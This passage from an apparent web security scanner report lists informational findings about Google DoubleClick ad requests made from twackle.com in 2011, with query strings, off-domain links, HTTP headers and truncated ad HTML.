GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307984468&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966468276&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307966468319&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1532849483&ga_fc=1&u_tz=-300&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=71&xpc=2rx0QIUY1e&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.157. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982638&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636714&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307964636348&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=1664&xpc=QIZyF8JeRE&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://s0.2mdn.net/2757332/728X90.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dsamsclub.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHvLkq8PgA6ijSXmI436MWcdZspSA

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982638&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636714&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307964636348&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=1664&xpc=QIZyF8JeRE&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.158. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307987532&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307969532138&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307969532175&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1691895108&ga_fc=1&u_tz=-300&u_his=23&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=114&xpc=7VyOei7CI6&p=http%3A//www.twackle.com

The response contains the following link to another domain:

http://ib.adnxs.com/ab?enc=pHA9CtcjE0CkcD0K1yMTQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQILl08oQGHZs_ayDGovBdy_9B_ZNAAAAAIwuAAC1AAAAlgIAAAIAAABJ9AUA0WMAAAEAAABVU0QAVVNEACwB-gAzC1gAAQ0BAgUCAQQAAAAA1h76uwAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+17350%2C+1307969533%29%3Buf%28%27r%27%2C+390217%2C+1307969533%29%3B&cnd=!1x12Owjc3gQQyegXGAAg0ccBMAA4sxZAAEiWBVAAWABgVWgAcAB4AIABBogBhAGQAQGYAQGgAQOoAQOwAQG5AZmZmQXXIxNAwQGZmZkF1yMTQMkBMzMzMzMz9z_QAQDZAQAAAAAAAPA_4AEA&ccd=!cAXULQjc3gQQyegXGNHHASAA&referrer=http://www.twackle.com/headlines&pp=TfYH_AAOvl4K7GXjwFAcGYPP8rmbov9jk0zoyA&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBGpAj_Af2Td78OuPLsQeZuMCCDNfq-NMBl6GU7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnR3YWNrbGUuY29tL2hlYWRsaW5lc5gCtCTAAgTIAoXSzwqoAwHoA4gC6APTKegDtQjoAxT1AwAAAMCABtGxmZqKk43kQQ%26num%3D1%26sig%3DAGiWqtwHrhU44K0-Tpb07XjtCvFJalVxJw%26client%3Dca-pub-7494156027018342%26adurl%3D

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307987532&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307969532138&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307969532175&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1691895108&ga_fc=1&u_tz=-300&u_his=23&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=114&xpc=7VyOei7CI6&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

18.159. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=60&slotname=1226764607&w=234&lmt=1307980481&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Ffansided%2FGeneral_Twackle_Widget&dt=1307962973566&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307962973945&frm=6&adk=226974441&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1864598234&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=-12245933&bih=-12245933&ifk=2884687976&ref=http%3A%2F%2Fsportdfw.com%2F2011%2F06%2F13%2F10-observations-dallas-mavs-finals%2F&fu=0&ifi=1&dtd=5814&xpc=JIorAZ3OEK&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/fansided/General_Twackle_Widget%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dwww.popperspenguins.com%26adT%3DMr.%2BPopper%2526%252339%253Bs%2BPenguins%26gl%3DUS&usg=AFQjCNHJKZbY-6G20gAuq98oPtP5x98Kdg

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 11:19:17 GMT
Server: cafe
Cache-Control: private
Content-Length: 9736
X-XSS-Protection: 1; mode=block
Expires: Mon, 13 Jun 2011 11:19:17 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#273147;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/fansided/General_Twackle_Widget%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dwww.popperspenguins.com%26adT%3DMr.%2BPopper%2526%252339%253Bs%2BPenguins%26gl%3DUS&usg=AFQjCNHJKZbY-6G20gAuq98oPtP5x98Kdg" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-ffffff.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.160. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982941&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964941367&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964941513&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=219547393&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895143&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=319&xpc=uiN7aVyGS5&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110608/r20110607/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dwww.BadIdeaTShirts.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNFKJ8GJg24X1KYb5p4Al9s_PFseMw

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982941&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964941367&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964941513&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=219547393&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895143&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=319&xpc=uiN7aVyGS5&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

18.161. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307984468&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966468373&bpp=6&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307966468319&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1532849483&ga_fc=1&u_tz=-300&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=46&xpc=ra8XIXq5Al&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/imgad?id=CLSbw7ijmN8iENgFGFoyCKaYcrRRb1XF
http://pagead2.googlesyndication.com/pagead/js/r20110601/r20110607/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dwww.Workamajig.com/Project-Mgmt%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHrEvU7HgeAFODaeXvqAvNppvysgA

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307984468&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966468373&bpp=6&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307966468319&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1532849483&ga_fc=1&u_tz=-300&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=46&xpc=ra8XIXq5Al&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 12:01:09 GMT
Server: cafe
Cache-Control: private
Content-Length: 4593
X-XSS-Protection: 1; mode=block

<html><head><style></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CLSbw7ijmN8iENgFGFoyCKaYcrRRb1XF">
...[SNIP]...
752517542%2526networkType%253Dcontent%2526url%255B%255D%253Dhttp%25253A%25252F%25252Fwww.workamajig.com%25252F%25253Fsrc%25253Dgg%252526kw%25253Dproject%252520management%252520tracking%252520software"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CLSbw7ijmN8iENgFGFoyCKaYcrRRb1XF" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBrq0DBfz1Tb-3BYP3lQfu-rz-CIaEovQBxqf2wBnAjbcBkMGrARABGAEgkKicEzgAUN-Hnfr9_____wFgydbyhsij_BqgAeWkuf8DsgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEE2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXPgAQOAAgG4AhioAwHoA4gC6AO1CPUDAAAAxA%26num%3D1%26sig%3DAGiWqtx7_Zov0qlwTc5aHDX1FcZ1AFdHuQ%26client%3Dca-pub-7494156027018342%26adurl%3Dhttp://27.xg4ken.com/media/redir.php%253Fprof%253D979%2526camp%253D15403%2526affcode%253Dkw8996%2526inhURL%253D%2526cid%253D6752517542%2526networkType%253Dcontent%2526url%255B%255D%253Dhttp%25253A%25252F%25252Fwww.workamajig.com%25252F%25253Fsrc%25253Dgg%252526kw%25253Dproject%252520management%252520tracking%252520software" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dwww.Workamajig.com/Project-Mgmt%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHrEvU7HgeAFODaeXvqAvNppvysgA" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110601/r20110607/abg.js"></script>
...[SNIP]...

18.162. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307988455&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307970455914&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307970455479&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1563624276&ga_fc=1&u_tz=-300&u_his=27&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895143&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=72&xpc=cpiCZ7Wtoh&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110608/r20110607/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3DConcur.com/Breeze_FreeTrial%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNG5B7ofnwUy54r45Bf3aBD2hj0dTA

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307988455&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307970455914&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307970455479&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1563624276&ga_fc=1&u_tz=-300&u_his=27&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895143&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=72&xpc=cpiCZ7Wtoh&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

18.163. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985704&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967704947&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967704990&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=740252110&ga_fc=1&u_tz=-300&u_his=17&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&dff=helvetica%20neue&dfs=16&biw=1049&bih=926&eid=33895299&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=88&xpc=pMHSVwABEa&p=http%3A//www.twackle.com

The response contains the following links to other domains:

http://altfarm.mediaplex.com/ad/js/14302-119028-2056-13?mpt=116368343&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253Dl%2526ai%253DBsgDu3AD2Tfi6PKfMsQfX45SBDNaooYACvvr7-xiemNXWTICFnwMQARgBIJConBM4AFCOi6m_______8BYMnW8obIo_waoAGC5ITwA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzuAIYwAIFyALomuEKqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADA%2526num%253D1%2526sig%253DAGiWqtxCM8gNeEVgTFGRkHDrV3gpF4chqg%2526client%253Dca-pub-7494156027018342%2526adurl%253D
http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.twackle.com/headlines%26hl%3Den%26client%3Dca-pub-7494156027018342%26adU%3Dconstantcontact.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGYrvtZV_VHsLMlyVa2Hpm_0LKr7g

Request

GET /pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985704&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967704947&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967704990&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=740252110&ga_fc=1&u_tz=-300&u_his=17&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&dff=helvetica%20neue&dfs=16&biw=1049&bih=926&eid=33895299&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=88&xpc=pMHSVwABEa&p=http%3A//www.twackle.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 13 Jun 2011 12:21:49 GMT
Server: cafe
Cache-Control: private
Content-Length: 2179
X-XSS-Protection: 1; mode=block
Expires: Mon, 13 Jun 2011 12:21:49 GMT

